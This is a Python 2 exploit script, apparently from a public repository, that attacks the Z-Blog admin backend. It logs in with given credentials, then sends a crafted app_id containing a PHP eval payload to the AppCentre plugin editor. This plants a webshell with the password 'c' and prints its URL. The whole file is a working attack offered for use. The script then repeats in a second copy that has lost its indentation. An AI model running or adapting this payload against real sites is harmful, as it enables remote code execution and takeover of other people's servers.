WangYihang/zblog-background-getshell-exploit.py

## zblog-background-getshell-exploit.py
#!/usr/bin/env python
# encoding:utf-8
# zblog-background-getshell-exploit
# Author : Shutdown_r & WangYihang

import requests
import hashlib
import sys
import string

prefix = "image"
webshell_password = "c"
filename = "update.php"

session = requests.Session()


def check_prefix(prefix):
    allow_chars = string.letters + string.digits
    if len(prefix) < 3:
        print "[-] The length of 'prefix' must > 3"
        return False
    for i in prefix:
        if i not in allow_chars:
            print "[-] The prefix must be [a-zA-Z0-9]"
            return False
    return True


def md5(content):
    return hashlib.md5(content).hexdigest()


def login(host, port, username, password):
    url = "http://%s:%d/zb_system/cmd.php?act=verify" % (host, port)
    data = {
        "username": username,
        "password": md5(password),
    }
    response = session.post(url, data=data)
    content = response.content
    return "后台首页" in content


def exploit(host, port):
    url = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % (
        host, port)
    data = {
        "app_id": "%s'.eval($_REQUEST[%s]).'" % (prefix, webshell_password),
        "app_path": filename,
    }
    response = session.post(url, data=data)
    content = response.content
    if "已存在同名的APP应用" in content:
        print "[-] PlugIn name has been used! Please change the prefix!"
        return False
    elif len(content) == 0:
        return True
    else:
        print "[-] Unknown error!"
        return False


def main():
    if len(sys.argv) != 5:
        print "Usage : "
        print "\tpython %s [HOST] [PORT] [USERNAEM] [PASSWORD]" % (sys.argv[0])
        print "Examplt : "
        print "\tpython exploit.py 127.0.0.1 80 admin admin"
        print "Script Author : "
        print "\tWangYihang<wangyihanger@gmail.com>"
        print "vulnerability Author : "
        print "\tShutdown-r"
        exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    username = sys.argv[3]
    password = sys.argv[4]
    if not check_prefix(prefix):
        exit(2)
    webshell_url = "http://%s:%d/zb_users/plugin/%s'.eval($_REQUEST[%s]).'/%s" % (host, port, prefix, webshell_password, filename)
    if not login(host, port, username, password):
        print "[-] Login failed!"
        print "[-] Please check your username and password"
        exit(3)
    print "[+] Login success!"
    print "[+] Starting exploit..."
    if exploit(host, port):
        print "[+] Exploit success!"
        print "[+] Enjoy your shell :"
        print "[+] Url : %s" % (webshell_url)
        print "[+] Pas : c"
        print "[+] Remember to die() it!"
    else:
        print "[-] Exploit failed!"


if __name__ == "__main__":
    main()
	#!/usr/bin/env python
	# encoding:utf-8
	# zblog-background-getshell-exploit
	# Author : Shutdown_r & WangYihang

	import requests
	import hashlib
	import sys
	import string

	prefix = "image"
	webshell_password = "c"
	filename = "update.php"

	session = requests.Session()


	def check_prefix(prefix):
	allow_chars = string.letters + string.digits
	if len(prefix) < 3:
	print "[-] The length of 'prefix' must > 3"
	return False
	for i in prefix:
	if i not in allow_chars:
	print "[-] The prefix must be [a-zA-Z0-9]"
	return False
	return True


	def md5(content):
	return hashlib.md5(content).hexdigest()


	def login(host, port, username, password):
	url = "http://%s:%d/zb_system/cmd.php?act=verify" % (host, port)
	data = {
	"username": username,
	"password": md5(password),
	}
	response = session.post(url, data=data)
	content = response.content
	return "后台首页" in content


	def exploit(host, port):
	url = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % (
	host, port)
	data = {
	"app_id": "%s'.eval($_REQUEST[%s]).'" % (prefix, webshell_password),
	"app_path": filename,
	}
	response = session.post(url, data=data)
	content = response.content
	if "已存在同名的APP应用" in content:
	print "[-] PlugIn name has been used! Please change the prefix!"
	return False
	elif len(content) == 0:
	return True
	else:
	print "[-] Unknown error!"
	return False


	def main():
	if len(sys.argv) != 5:
	print "Usage : "
	print "\tpython %s [HOST] [PORT] [USERNAEM] [PASSWORD]" % (sys.argv[0])
	print "Examplt : "
	print "\tpython exploit.py 127.0.0.1 80 admin admin"
	print "Script Author : "
	print "\tWangYihang<wangyihanger@gmail.com>"
	print "vulnerability Author : "
	print "\tShutdown-r"
	exit(1)
	host = sys.argv[1]
	port = int(sys.argv[2])
	username = sys.argv[3]
	password = sys.argv[4]
	if not check_prefix(prefix):
	exit(2)
	webshell_url = "http://%s:%d/zb_users/plugin/%s'.eval($_REQUEST[%s]).'/%s" % (host, port, prefix, webshell_password, filename)
	if not login(host, port, username, password):
	print "[-] Login failed!"
	print "[-] Please check your username and password"
	exit(3)
	print "[+] Login success!"
	print "[+] Starting exploit..."
	if exploit(host, port):
	print "[+] Exploit success!"
	print "[+] Enjoy your shell :"
	print "[+] Url : %s" % (webshell_url)
	print "[+] Pas : c"
	print "[+] Remember to die() it!"
	else:
	print "[-] Exploit failed!"


	if __name__ == "__main__":
	main()